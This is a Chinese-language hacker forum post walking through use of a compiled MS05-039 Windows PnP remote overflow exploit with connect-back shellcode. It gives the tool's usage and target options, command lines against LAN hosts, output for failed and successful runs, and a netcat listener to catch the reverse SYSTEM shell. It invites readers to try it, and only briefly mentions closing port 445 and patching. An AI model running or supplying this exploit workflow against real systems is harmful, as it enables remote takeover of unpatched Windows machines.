几天没来上网,不知道兄弟们都在忙些什么.....
群里居然在玩溢出,汗,还玩的不奕乐乎.....想起当年的MS04011加上Serv_U的溢出可是爽了N久吧..........现在呢...
E:\hacker>ms05039
???????????????? MS05-039 Windows PnP Remote Overflow Exploit
??????????????? Connect back shellcode Edition By superlone[EST]
??????????????????????? Tested On Windows 2000 PRO SP4 CN
??????? Usage:
???????????????? ms05039 <host> <conIP> <conPort> [target]
??????? Options:
???????????????? host? <--------> target IP or domain name
???????????????? conIP <--------> connect back IP
??????????????? conPort<--------> connect back PORT
??????????????? target <--------> taget system TYPE default is 1
??????? Targets:
?????????????????? 0?? <--------> Universal jmp ebx address on EN System
?????????????????? 1?? <--------> Universal jmp ebx address on CN System
外国的那个EXP功能不行,所以superlone[EST]把内部的shellcode改成了反弹式的,用起来确实不错,我没条件测试,只稍测试了一下,虽然这个漏洞的说明上写着XP SP2也受此影响,不过我拿我自己的机器和云的机器测试都没有成功....哈哈,难道我错了吗???
出现以下的情况说明没发送数据包成功:
E:\hacker>ms05039 192.168.1.113 192.168.1.123 4567 1
???????????????? MS05-039 Windows PnP Remote Overflow Exploit
??????????????? Connect back shellcode Edition By superlone[EST]
??????????????????????? Tested On Windows 2000 PRO SP4 CN
[+] Trying to connect to remote port on192.168.1.113:445...ESTABLISHED
[+] Making null session...
[!] Failed to get responding data
E:\hacker>
出现以下的可能成功了:
E:\hacker>ms05039 192.168.1.112 192.168.1.123 4567 1
???????????????? MS05-039 Windows PnP Remote Overflow Exploit
??????????????? Connect back shellcode Edition By superlone[EST]
??????????????????????? Tested On Windows 2000 PRO SP4 CN
[+] Trying to connect to remote port on192.168.1.112:445...ESTABLISHED
[+] Making null session...OK
[+]Trying to bind pipe...OK
[*] Tring to send crafted packet...OK
[+]Exploit done!Check your reverse shell on 192.168.1.123:4567
E:\hacker>
这个时候再开一个CMD用NC监听4567端口(自己设一个):
E:\hacker>nc -l -p 4567
如果成功就出现了可爱的CMDShell界面了,可惜我这里没成功,据兄弟测试结果,在2000 SP4比较成功.....有空的兄弟去测试下吧,有好的办法给偶说下,偶可能在哪有问题.....后来看到无敌说的:这个漏洞既可以用来远程溢出(只适用于目标系统是2000和xp sp1),也可以用来本地提升权限(2000以上版本都可以)。而且溢出成功后会得到一个SYSTEM权限的shell。。汗,我在寝室内网构建的机器都是xp sp2了哎!)
PS:临时解决方法:关闭445端口,禁止任何连接.
最完美的解决方法:打上最新补丁....
想知道更多的请参考以下链接:
http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx
http://www.eviloctal.com/forum/read.php?tid=13433
?